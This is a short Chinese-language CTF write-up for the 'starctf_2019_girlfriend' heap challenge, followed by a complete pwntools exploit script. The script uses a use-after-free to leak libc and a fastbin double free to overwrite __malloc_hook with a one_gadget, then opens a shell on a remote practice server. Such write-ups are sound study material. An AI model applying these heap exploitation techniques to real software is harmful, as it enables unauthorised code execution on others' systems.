starctf_2019_girlfriend
查看保护
简单题目
一个uaf
攻击思路:利用uaf打出libc。再利用double free申请到malloc_hook - 0x23,劫持malloc_hook,利用realloc调整堆栈就可以getshell了。
具体的uaf手法可以看z10r’s blog
from pwn import *
context(arch='amd64', os='linux', log_level='debug')
file_name = './z1r0'
li = lambda x : print('\x1b[01;38;5;214m' + x + '\x1b[0m')
ll = lambda x : print('\x1b[01;38;5;1m' + x + '\x1b[0m')
debug = 1
if debug:
r = remote('node4.buuoj.cn', 29617)
else:
r = process(file_name)
elf = ELF(file_name)
def dbg():
gdb.attach(r)
menu = 'Input your choice:'
def add(size, name, call):
r.sendlineafter(menu, '1')
r.sendlineafter("Please input the size of girl's name", str(size))
r.sendafter('please inpute her name:', name)
r.sendafter('please input her call:', call)
def show(index):
r.sendlineafter(menu, '2')
r.sendlineafter('Please input the index:', str(index))
def delete(index):
r.sendlineafter(menu ,'4')
r.sendlineafter('Please input the index:', str(index))
add(0x80, 'aaa', 'bbbb')
add(0x60, 'bbb', 'aaaa')
add(0x60, 'aaa', 'cccc')
add(0x10, 'ddd', 'ddd')
delete(0)
show(0)
malloc_hook = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00')) - 88 - 0x10
li('[+] malloc_hook = ' + hex(malloc_hook))
libc= ELF('./libc-2.23.so')
libc_base = malloc_hook - libc.sym['__malloc_hook']
one = [0x45226, 0x4527a, 0xf03a4, 0xf1147]
one_gadget = one[3] + libc_base
realloc = libc.sym['realloc'] + libc_base
delete(1)
delete(2)
delete(1)
add(0x60, p64(malloc_hook - 0x23), p64(malloc_hook - 0x23))
add(0x60, 'aaaa', 'bbb')
add(0x60, 'aaaa', 'bbbb')
p1 = b'a' * (0x13 - 8) + p64(one_gadget) + p64(realloc + 0x2)
add(0x60, p1, '\n')
r.sendlineafter(menu, '1')
r.interactive()